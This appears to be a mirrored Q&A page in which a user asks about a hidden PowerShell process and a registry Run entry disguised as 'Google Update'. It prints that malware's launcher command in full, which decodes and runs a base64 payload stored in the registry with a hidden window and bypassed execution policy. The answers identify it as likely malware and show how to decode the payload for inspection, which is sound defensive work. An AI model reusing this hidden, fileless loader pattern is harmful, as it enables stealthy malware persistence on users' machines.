stackoom
  简体   繁体   中英

How can i read the contents of a powershell script running in the background?

 原文  2016-03-29 08:05:12       powershell/ batch-file

Question

I get this line by ProcessExplorer

C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL').LOOTDA)));

It looks suspicious or normal ? Is that mean that the script is saved in registry and not in a file ? how to read then ?

Edit : Now i'm sure that can be an encoded virus when i read this on the registry :

Google Update REG_SZ
"C:\\Users\\michael\\AppData\\Local\\Google\\Update\\GoogleUpdate.exe" /c {BE9473EA-5660-4BF7-91C3-2A2258213EE1} REG_SZ C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL').LOOTDA)));

Edit on 29/03/2016 @ 15:55

If anybody want to continue this discussion i asked it here to decode this virus :

How can i read the source code of this encoded powershell script from the registry?

2 answers

solution1
 1 ACCPTED  2016-03-29 09:54:45

C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL').LOOTDA)));

This code means that PowerShell will execute with no window and bypassing ExecutionPolicy restrictions a command from registry key HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL (base64-encoded).

Looks like a virus to me.

You can identify the command if you execute this code in the PowerShell console: 

([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)))

This will show you what is intended to execute.

solution2
 1  2016-03-29 13:18:42

I got the same. i'm not sure, but it would be a hidden script runs in powershell. the script may be a phishing one. i think mine send emails to my outlook contacts.

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question How can I create a log of a powershell script running in the background? How can I stop Excel processes from running in the background after a PowerShell script? Read the contents of a hidden powershell script running trough Task Scheduler How can I remove this script starting in the background and messing up with PowerShell? How can I tell if Docker Desktop is running in a Powershell script? How can I automate running a PowerShell script that prompts UI for choice? how to read the returned values from running a powershell script How can I change the version of powershell I'm running in from within the script? How can I run a powershell script as a background task without displaying a window? Hiding Window with Powershell script running in the background
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM